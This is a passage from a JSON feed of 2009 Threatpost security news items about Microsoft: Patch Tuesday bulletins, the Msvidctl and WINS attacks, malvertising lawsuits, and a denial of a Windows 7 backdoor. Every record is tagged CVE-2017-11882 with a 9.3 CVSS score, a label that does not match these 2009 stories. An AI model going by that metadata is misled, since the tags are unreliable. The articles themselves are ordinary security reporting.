"https://threatpost.com/microsoft-reconoce-falla-en-ie-7-112409/73159/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:10", "description": "Microsoft today denied that it has built a \nbackdoor into Windows 7, a concern that surfaced yesterday after a \nsenior National Security Agency (NSA) official testified before \nCongress that the agency had worked on the operating system. \u201cMicrosoft has not and will not put \u2018backdoors\u2019 into Windows,\u201d a company spokeswoman said. [Read the full article](<http://www.computerworld.com/s/article/9141182/Microsoft_denies_it_built_backdoor_in_Windows_7>). [Computerworld]\n", "cvss3": {}, "published": "2009-11-19T21:17:20", "type": "threatpost", "title": "MS Denies Windows 7 Backdoor Allegations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:06:04", "id": "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "href": "https://threatpost.com/ms-denies-windows-7-backdoor-allegations-111909/73142/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:15", "description": "[](<https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/>)WASHINGTON\u2013Microsoft has spent several years and untold millions of dollars working on methods to write more secure and reliable software, and now the company is encouraging other organizations to make the same investment in software security.\n\nOne of the outputs of the company\u2019s software security efforts is its much-heralded Security Development Lifecycle (SDLC), a framework for developing methods for writing secure code. However, as Microsoft has acknowledged and other experts have pointed out, the SDLC was developed specifically for Microsoft\u2019s own internal processes and is not a one-size-fits-all methodology. But companies that are interested in using the lessons that Microsoft has learned throughout the process can use the SDLC as a starting point for their own efforts, Jim Molini, a senior program manager at Microsoft said in a talk at the OWASP AppSec DC conference here Thursday.\n\n\u201cIf you build software, you have to focus on how you build it, because it\u2019s becoming a higher priority attack vector right now,\u201d he said. \u201cThey\u2019re finding new ways to attack us and we have to find ways to buttress our software against these attacks.\u201d\n\nMolini said that a software security program has to be a comprehensive effort that includes everyone involved in the development process and must start with a fundamental change in the way that software is written. \n\n\u201cYou have to eliminate the separation of security in the development organization,\u201d he said. \u201cIt\u2019s really going to take people working together to fix this.\u201d\n\nMolini also emphasized that just having a whole bunch of other developers or testers look at the code is not enough.\n\n\u201cMany eyeballs don\u2019t solve the security problem. It\u2019s more than just being able to write code,\u201d Molini said. \u201cIt\u2019s fixing the process aspects and the software development processes in order to reduce the number of vulnerabilities you introduce. You can\u2019t just say zero-defect code is secure. You have to prioritize security as a development goal.\u201d\n\nSoftware security experts often say that when they show developers ways that their applications can be broken or abused, the developers protest that no user would ever do the things that broke the application. Users may not, but attackers most certainly will. To help eliminate this mentality, Molini said developers need to think like attackers and not users.\n\n\u201cYou need to develop abuse cases, not just use cases, so that the test team can develop tests for them,\u201d he said. \u201cThat will make your software much more secure in the long run.\u201d\n", "cvss3": {}, "published": "2009-11-12T19:08:15", "type": "threatpost", "title": "Microsoft Pushes for Better Software Security Practices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:11:49", "id": "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "href": "https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/73089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:22", "description": "After releasing its largest-ever group of security[](<https://threatpost.com/microsoft-cleans-bugs-after-biggest-patch-release-103009/>) patches two weeks ago, Microsoft has done a little cleaning up.\n\nOver the past few days, the company has re-released two security updates and issued a workaround for a Windows CryptoAPI patch that caused Microsoft\u2019s own instant-messaging server to crash. [Read the full story](<http://www.computerworld.com/s/article/9140139/Microsoft_cleans_up_bugs_after_biggest_patch_release?source=rss_security>) [IDG News Service/Robert McMillan]\n", "cvss3": {}, "published": "2009-10-30T13:53:35", "type": "threatpost", "title": "Microsoft Cleans Up Bugs After Biggest Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:19:07", "id": "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "href": "https://threatpost.com/microsoft-cleans-bugs-after-biggest-patch-release-103009/72929/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:29", "description": "Computerworld\u2019s Gregg Keizer brings word that this week\u2019s record-setting [batch of patches](<https://threatpost.com/microsoft-finally-shuts-door-atl-bugs-101509/>) from Microsoft actually closed the book on the vexing ATL code library issues that first surfaced in July 2009.\n\nKeizer quotes Ryan Smith, one of the hackers credited with discovering the flaw, as saying that the latest Microsoft Office updates shut the door on the last big attack vector for the ATL vulnerability. [Read the full story](<http://www.computerworld.com/s/article/9139371/Microsoft_patches_last_major_ATL_bugs?source=rss_security>) [computerworld.com]\n", "cvss3": {}, "published": "2009-10-15T14:09:39", "type": "threatpost", "title": "Microsoft Finally Shuts Door on ATL Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:41", "id": "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "href": "https://threatpost.com/microsoft-finally-shuts-door-atl-bugs-101509/72329/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:35", "description": "Less than a week after [a malicious advertising attack against the New York Times](<https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/>) ad servers, Microsoft filed five civil lawsuits against companies allegedly using online advertising to serve malware.\n\nThe lawsuits allege that individuals using the business names \u201cSoft Solutions,\u201d \u201cDirect Ad,\u201d \u201cqiweroqw.com,\u201d \u201cITmeter INC.\u201d and \u201cote2008.info\u201d used malvertisements to distribute malicious software or present deceptive websites that peddled scareware to unsuspecting Internet users.\n\n\u201cAlthough we don\u2019t yet know the names of the specific individuals behind these acts, we are filing these cases to help uncover the people responsible and prevent them from continuing their exploits, [said Tim Cranton](<https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/>), associate general counsel at Microsoft.\n\nOur filings in King County Superior Court in Seattle outline how we believe the defendants operated, but in general, malvertising works by camouflaging malicious code as harmless online advertisements. These ads then lead to harmful or deceptive content. For example, ads may redirect users to a website that advertises rogue security software, also known as scareware, that falsely claims to detect or prevent threats on the computer. Malvertising may also directly infect a victim\u2019s computer with malicious software like Trojans \u2013 programs that can damage data, steal personal information or even bring the users\u2019 computer under the control of a remote operator.\n\nHere are the copies of Microsoft\u2019s court filings:\n\n * Microsoft Corp. and Microsoft Online Inc. v. John Does 1-20, d/b/a DirectAd Solutions: King Co. Superior Court Cause [No. 09-2-34024-2 SEA](<http://microsoftontheissues.com/cs/files/folders/32725/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a Soft Solutions, Inc. King Co. Superior Court Cause [No. 09-2-34021-8 SEA](<http://microsoftontheissues.com/cs/files/folders/32719/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a qiweroqw.com: King Co. Superior Court Cause [No. 09-2-34020-0 SEA](<http://microsoftontheissues.com/cs/files/folders/32722/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a ote2008.info: King Co. Superior Court Cause [No. 09-2-34022-6 SEA](<http://microsoftontheissues.com/cs/files/folders/32720/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a ITmeter Inc. : King Co. Superior Court Cause [No. 09-2-34023-4 SEA](<http://microsoftontheissues.com/cs/files/folders/32724/download.aspx>)\n", "cvss3": {}, "published": "2009-09-23T22:40:03", "type": "threatpost", "title": "Microsoft Takes Aim at Malvertising Threat", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:50", "id": "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "href": "https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/72218/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:38", "description": "****[](<https://threatpost.com/stephen-toulouse-msrc-evolution-security-microsoft-and-securing-xbox-live-091009/>)Dennis Fisher talks with Stephen Toulouse, director of policy and enforcement for Xbox Live at Microsoft, about his years at the Microsoft Security Response Center, the evolution of security at Microsoft and the joy and pain of being the bad guy on Xbox Live.\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_301.mp3>)\n\nSubscribe to the Digital Underground podcast on [****](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-09-10T19:45:50", "type": "threatpost", "title": "Stephen Toulouse on the MSRC, the Evolution of Security at Microsoft and Securing Xbox Live", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "href": "https://threatpost.com/stephen-toulouse-msrc-evolution-security-microsoft-and-securing-xbox-live-091009/73017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "Microsoft\u2019s September batch of security updates will include fixes for a multiple \u201ccritical\u201d vulnerabilities affecting the Windows operating system.[](<https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/>)\n\nIn all, the software maker [will release five bulletins](<http://www.microsoft.com/technet/security/bulletin/ms09-sep.mspx>) with patches for a range of flaws that could expose users to remote code execution attacks.\n\nThe flaws affected all supported versions of Windows, including Windows Vista and Windows Server 2008.\n\nMicrosoft describes a \u201ccritical\u201d vulnerability as one whose exploitation could allow the propagation of an Internet worm without user action so it\u2019s important that Windows users treat next Tuesday\u2019s updates with the highest priority.\n\nIt is not yet clear if this month\u2019s patches will cover the FTP in IIS vulnerability that was disclosed with exploit code earlier this week.\n", "cvss3": {}, "published": "2009-09-08T11:59:04", "type": "threatpost", "title": "Five Critical Bulletins Coming on MS Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:49", "id": "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "href": "https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/72234/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:43", "description": "[](<https://threatpost.com/windows-wins-attacks-wild-081909/>)The \u201ccritical\u201d WINS vulnerability that Microsoft issued a patch for last week is now being exploited actively in the wild, [according to the SANS Institute](<http://isc.sans.org/diary.html?storyid=6976>) [sans.org].\n\nThe Internet Storm Center (ISC), which is operated by SANS, is receiving preliminary reports that hackers are targeting Microsoft\u2019s WINS service on Windows NT, 2000 and 2003 servers. [Read the full story](<http://www.cio.com/article/499904/Windows_WINS_Attacks_in_the_Wild?source=rss_security>) [networkworld.com]\n", "cvss3": {}, "published": "2009-08-19T14:44:56", "type": "threatpost", "title": "Windows WINS Attacks In The Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:50", "id": "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "href": "https://threatpost.com/windows-wins-attacks-wild-081909/72957/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:44", "description": "[From Network World (Ellen Messmer)](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>)[](<https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/>)\n\nMicrosoft\u2019s Internet Explorer 8 rated tops among five browsers tested by NSS Labs for effectiveness in protecting against malware and phishing attacks \u2014 though NSS Labs acknowledges Microsoft paid for the tests.\n\nNevertheless, the test process, which lasted over a two-week period in July at the NSS Labs in Austin, evaluated the browsers based on access to live Internet sites and in theory could be duplicated elsewhere. Apple Safari 4, Google Chrome 2, Mozilla Firefox 3, and Opera 10 beta were evaluated as being behind Microsoft IE 8 when it comes to browser protection against phishing and malware, mainly because Microsoft was deemed more speedy and comprehensive in delivering updates about known phishing and malware to the user\u2019s desktop browser. [Read the full story](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>) [thestandard.com] Here\u2019s [a link to the study and results](<http://nsslabs.com/test-reports/NSS%20Labs%20Browser%20Security%20Test%20-%20Socially%20Engineered%20Malware.pdf>) [pdf from nsslabs.com]\n", "cvss3": {}, "published": "2009-08-14T16:33:17", "type": "threatpost", "title": "Microsoft IE 8 Shines in Web Browser Security Test", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "href": "https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/72970/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:49", "description": "[From Washington Post (Brian Krebs)](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>)\n\n[](<https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/>)Microsoft may soon be taking the unusual step of issuing an out-of-band security update to address multiple weaknesses that stem from a Windows security flaw that the software giant tried to fix earlier this month. [Read the full story](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>) [washingtonpost.com] See more details [at Halvar Flake\u2019s blog](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>) [blogspot.com]\n", "cvss3": {}, "published": "2009-07-24T14:02:10", "type": "threatpost", "title": "Microsoft Scrambling to Close Stubborn Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:56", "id": "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "href": "https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/72881/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:51", "description": "\n\nMicrosoft released six security bulletins today \u2014 three rated Critical and three rated Important. Two of the issues are being actively exploited on the Internet and four of the issues are client-side vulnerabilities, which means the exploit can only occur if a user visits an evil website or opens a malformed document.\n\nToday\u2019s release is important because patches were released for two recent 0-day attacks \u2013 a QuickTime file parsing vulnerability and the recently announced Directshow vulnerability. Both vulnerabilities are reported as being actively exploited on the Internet.\n\nWhile Microsoft has announced workarounds and/or provided Fixit tools for each of these issues, today\u2019s patches will be welcomed by network administrators who have been tasked with remediating these issues. I recommend that network administrators download and install the patches for these two bulletins as soon as possible (MS09-032 and MS09-028)\n\nTwo of Microsoft\u2019s other releases this month apply to products that you don\u2019t see patched very often \u2013 ISA Server 2006 and Virtual PC. Although these two products are associated with security functions, neither flaw is as bad as it seems and Microsoft has rated the severity for each of these as Important.\n\nOf the two remaining bulletins, one applies to Publisher (Important) and one applies to the Operating System (Critical). Neither of these issues were publicly known prior to release, though I recommend reviewing and installing each of these patches as appropriate on your networks. The Operating System patch (MS09-029) is particularly nasty and can execute when a user views an evil web page, email, or Office document.\n\nI recommend installing MS09-028, 29, and 32 patches first (DirectShow, OS Font patch, and Video Control). These are the three Critical patches \u2013 which goes to show that Microsoft got the Severity ratings spot-on this month.\n\n**Details for MS09-032 and MS09-028:**\n\nMS09-032 is the bulletin for the QuickTime file parsing vulnerability. Clicking on an evil hyperlink or even hovering your mouse over a malformed QuickTime file could allow the attacker to execute code on your system. The attacker\u2019s code would have the same level of permission to your computer as the person who is logged on to the computer. If you\u2019re logged on as admin, the exploit could add or remove users and administrators from your machine, delete files, reformat your hard drive, or embed trojans or worms that could be used in future attacks.\n\nIt\u2019s important to note for this issue that the presence or absence of Adobe QuickTime is not relevant to whether or not your computer is vulnerable to this issue. The flaw resides in the Microsoft components that parse QuickTime files \u2013 so don\u2019t believe that you\u2019re safe just because you don\u2019t have QuickTime installed. Also, the recent QuickTime patch from Adobe (7.6.2) is not related to this issue.\n\nMS09-032 is rated as Critical for all Operating Systems.\n\nMS09-028 is the bulletin for the recently announced Microsoft DirectShow vulnerability. Viewing a malformed media file from a Windows XP or Windows Server 2003 system can enable the attacker to execute code on your system. Similar to MS09-032, the evil code will run in the context of the currently logged on user and can take any action on that system that the logged on user can take.\n\nMicrosoft released a FixIt tool that sets the browser killbits for this vulnerable section of code. The MS09-032 patch is a cumulative killbit patch that includes the killbits from the FixIt tool as well as all previously released ActiveX killbits. Users who installed the ActiveX cumulative patch from June 2009 and also ran the FixIt tool for the DirectShow have already implemented the complete set of killbits reprented by the MS09-028 patch. If you ran the FixIt tool or otherwise implemented the Microsoft suggested workaround you are safe \u2013 there\u2019s no need to revert changes that you made.\n\nWhile the public exploit only impacts XP and 2003 systems, Microsoft recommends installing this patch on all Operating Systems as it includes killbits for all previously known bad ActiveX controls.\n\nDetails for the remaining four:\n\n**MS09-029** applies to all Operating Systems and could be a particularly nasty issue if left unpatched. The flaw resides in the way that Microsoft parses embedded fonts on web pages, emails, and Office documents. (in this case, embedded opentype fonts. EOT fonts ensure that everyone viewing the text sees it formatted the same way.) Viewing an evil web page, email, or Office doc could allow the attacker to execute code on your system. Workarounds are available, but it requires two separate changes to be made \u2013 one to protect from web content and the other to protect from evil emails and documents.\n\n**MS09-030** is a vulnerability in Microsoft Publisher documents. Viewing a malformed document could allow the attacker to run code on your system. This seems like the hundredth vulnerability in Publisher this year, and the millionth \u2018open an evil document and get hacked\u2019 vulnerability in the past two years.\n\n**MS09-031** discusses an issue with ISA Server 2006. If the ISA Server is specifically configured to use Radius one-time-passwords AND to use Kerberos for authentication AND to fallback to basic http authentication when asked, the attacker may be able to access servers protected by the firewall if they know the username of those target systems. It sounds scary, but it\u2019s probably a very small number of systems in the world that are configured exactly this way. An edge case at best. If you have an ISA Server 2006 and you\u2019re concerned that you might meet all three criteria above, it\u2019s best to patch your system. \n** \nMS09-033** relates to Guest Operating Systems that are hosted on Microsoft Virtual PC or Virtual Server. These virtualized systems are subject to a privilege escalation attack. (Non-virtualized systems are not vulnerable.) Users who can execute code on the virtual systems can run an exploit and become administrator on the virtual images. At no time can this flaw lead to compromise of the underlying Virtual PC or Virtual Server. IOW, it\u2019s not the much-hyped but yet-to-be-seen exploit that crosses the virtualization barrier.\n\n_* Eric Schultze is chief technology officer at Shavlik Technologies, a vulnerability management company._\n", "cvss3": {}, "published": "2009-07-14T19:02:19", "type": "threatpost", "title": "Inside Microsoft's July Security Patch Batch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T16:20:54", "id": "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "href": "https://threatpost.com/inside-microsofts-july-security-patch-batch-071409/72909/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:53", "description": "[](<https://threatpost.com/updated-mass-attacks-exploiting-0-day-microsoft-video-dll-070609/>)\n\nThere is a widespread attack underway against an unpatched vulnerability in the Msvidctl DLL, with attackers using thousands of newly compromised Web sites to exploit victims\u2019 PCs via drive-by downloads. The attacks are using Internet Explorer as the attack vector and are pushing a Trojan downloader onto compromised machines.\n\nThe attacks are using injected iFrames and redirecting users to the compromised sites, many of which appear to be in China, experts say. The vulnerability the attacks are exploiting is not the zero-day flaw in Microsoft\u2019s DirectShow component, as was previously reported. Instead, the attacks are going after an undisclosed bug in Msvidctl.dll, a DLL that\u2019s associated with streaming video content on the Web.\n\nOnce a machine is compromised, the attackers are pushing a Trojan downloader program to the victims\u2019 PCs. The malware that is being pushed is already detected by many antimalware programs. The SANS Internet Storm Center recommends setting the killbit on the vulnerable DLL to protect against the attack.\n\nMicrosoft has set up a page with information on how to work around the vulnerability and FixIt tool to [set the killbit automatically](<http://support.microsoft.com/kb/972890>), preventing exploitation of the flaw.\n\nMicrosoft also has released an [advisory on the Msvidctl.dll vulnerability](<http://www.microsoft.com/technet/security/advisory/972890.mspx>) and said it is investigating the issue. The company said users of Windows XP and Windows 2003 should disable the affected ActiveX control. From the advisory:\n\nOur investigation has shown that there are no by-design uses for this ActiveX Control in Internet Explorer which includes all of the Class Identifiers within the msvidctl.dll that hosts this ActiveX Control. For Windows XP and Windows Server 2003 customers, Microsoft is recommending removing support for this ActiveX Control within Internet Explorer using all the Class Identifiers listed in the **Workaround** section. Though unaffected by this vulnerability, Microsoft is recommending that Windows Vista and Windows Server 2008 customers remove support for this ActiveX Control within Internet Explorer using the same Class Identifiers as a defense-in-depth measure.\n\nCustomers may prevent the Microsoft Video ActiveX Control from running in Internet Explorer, either manually using the instructions in the **Workaround** section or automatically using the solution found in [Microsoft Knowledge Base Article 972890](<http://support.microsoft.com/kb/972890>). By preventing the Microsoft Video ActiveX Control from running in Internet Explorer, there is no impact to application compatibility.\n\nThe attacks against the Msvidctl.dll are following in the footsteps of the attackers who have been using SQL injection to compromise thousands of legitimate sites for the last year or so. The specific attack vector is different, but the idea is the same: compromise a large number of sites, attract vulnerable users and install your malware.\n\nThis has proven to be a very lucrative and effective attack method of late, and has been used to push all sorts of malware. Attackers can install keyloggers, Trojans or whatever other programs they choose once they\u2019ve exploited a given PC. That much hasn\u2019t changed. What has is the variety of vectors that attackers have at their disposal for these attacks. The number of sites that are vulnerable to SQL injection is incalculable, and many sites that are cleaned once are reinfected over and over, researchers say.\n\nThe SANS Internet Storm Center also has put together a running l[ist of all of the domains that currently are exploiting the vulnerability](<http://isc.sans.org/diary.html?storyid=6739&rss>). The list contains a few dozen domains right now, and there also is a separate list of domains that are pushing the binary to compromised machines.\n\n \n[](<http://go.microsoft.com/?linkid=9672398>)[Click Here To Kill-Bit MSVidCtl](<http://go.microsoft.com/?linkid=9672398> \"Click Here To Kill-Bit MSVidCtl\" )\n", "cvss3": {}, "published": "2009-07-06T14:55:43", "type": "threatpost", "title": "UPDATED: Mass Attacks Exploiting 0-Day in Microsoft Video DLL", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:01", "id": "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "href": "https://threatpost.com/updated-mass-attacks-exploiting-0-day-microsoft-video-dll-070609/72820/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "This video features Tim Rains and Vinny Gullotto of Microsoft discussing the major threats from the second half of 2008.\n", "cvss3": {}, "published": "2009-06-22T10:33:11", "type": "threatpost", "title": "Microsoft Security Intelligence Report: The Vinny and Tim Show", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "href": "https://threatpost.com/microsoft-security-intelligence-report-vinny-and-tim-show-062209/72853/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "[From InfoWorld (Roger Grimes)](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)\n\n[](<https://threatpost.com/microsoft-takes-lead-security-061909/>)Talk about a turnaround. It\u2019s always hard to recognize the larger, slow-moving paradigm shifts as they happen. But after a decade of bad press regarding its commitment to software security, Microsoft seems to have turned the tide. Redmond is getting consistent security accolades these days, often from the very critics who used to call it out. Many of the world\u2019s most knowledgeable security experts are urging their favorite software vendors to follow in the footsteps of Microsoft. Read the full story [[InfoWorld.com](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)].\n", "cvss3": {}, "published": "2009-06-19T18:13:35", "type": "threatpost", "title": "Microsoft Takes the Lead in Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "href": "https://threatpost.com/microsoft-takes-lead-security-061909/72854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:58", "description": "[From ZDNet (Ryan Naraine)](<http://blogs.zdnet.com/security/?p=3553>)\n\nMicrosoft\u2019s batch of patches this month is a big one: 10 bulletins covering a total of 31 documented vulnerabilities affecting the Windows OS, the Internet Explorer browser and the Microsoft Office productivity suite (Word, Works and Excel).\n\nFive of the 10 bulletins are rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Among the patches this month are fixes for [a pair of IIS WebDav flaws that were publicly disclosed](<http://blogs.zdnet.com/security/?p=3424>) last month and cover for the [CanSecWest Pwn2Own vulnerability](<http://blogs.zdnet.com/security/?p=2951>) that was used to exploit Internet Explorer on Windows 7. Read the full story [here](<http://blogs.zdnet.com/security/?p=3553>).\n", "cvss3": {}, "published": "2009-06-09T20:26:38", "type": "threatpost", "title": "Microsoft unleashes 31 fixes on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:09", "id": "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "href": "https://threatpost.com/microsoft-unleashes-31-fixes-patch-tuesday-060909/72724/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:59", "description": "Microsoft plans to ship 10 security bulletins next Tuesday (June 9, 2009) with fixes for a wide range of code execution vulnerabilities affecting Windows, Microsoft Office and Internet Explorer.\n\nSix of the ten bulletins will be rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. See the [advance notice advisory](<http://www.microsoft.com/technet/security/bulletin/ms09-jun.mspx>) [microsoft.com]. Read more [at ZDNet Zero Day](<http://blogs.zdnet.com/security/?p=3503>).\n", "cvss3": {}, "published": "2009-06-04T18:02:33", "type": "threatpost", "title": "Coming on MS Patch Tuesday: 10 bulletins, 6 critical", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:08", "id": "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "href": "https://threatpost.com/coming-ms-patch-tuesday-10-bulletins-6-critical-060409/72733/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "Microsoft has confirmed the reported [vulnerability in the WebDAV implementation in IIS 5.0, 5.1 and 6.0](<http://www.microsoft.com/technet/security/advisory/971492.mspx>), saying that the flaw could be used to bypass the authentication mechanism on the Web server. However, the company said that there are a number of mitigating factors involved and that company security officials have not seen any attacks against the weakness so far.\n\nMicrosoft officials said that the vulnerability is mitigated by several things, including the fact that WebDAV is not enabled by default on IIS 6.0. However, the WebDAV protocol is widely used to share documents and information on Web servers. Normally implemented access control lists (ACLs), which prevent users from accessing files that they do not have permission to access, also would limit the damage of an attack.\n\nThe company also said that the vulnerability affects versions 5.0 and 5.1 of IIS, along with 6.0, which was the version that had been reported to be vulnerable originally. The most effective workaround until a patch is available is to disable WebDAV.\n", "cvss3": {}, "published": "2009-05-19T13:59:37", "type": "threatpost", "title": "Microsoft confirms flaw in WebDAV in IIS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:13", "id": "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "href": "https://threatpost.com/microsoft-confirms-flaw-webdav-iis-051909/72674/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "[From Computerworld (Gregg Keizer)](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>)[](<https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/>)\n\nAfter discovering attack code on a brand new Windows XP netbook, anti-virus vendor Kaspersky Labs warned users yesterday that they should scan virgin systems for malware before connecting them to the Internet.\n\nWhen Kaspersky developers installed their recently-released Security for Ultra Portables on an M&amp;A Companion Touch netbook purchased for testing, \u201cthey thought something strange was going on,\u201d [said Roel Schouwenberg](<http://www.viruslist.com/en/weblog?weblogid=208187720>) [viruslist.com], a senior anti-virus researcher with the Moscow-based firm. Schouwenberg scanned the machine \u2014 a $499 netbook designed for the school market \u2014 and found three pieces of malware. [Read the full 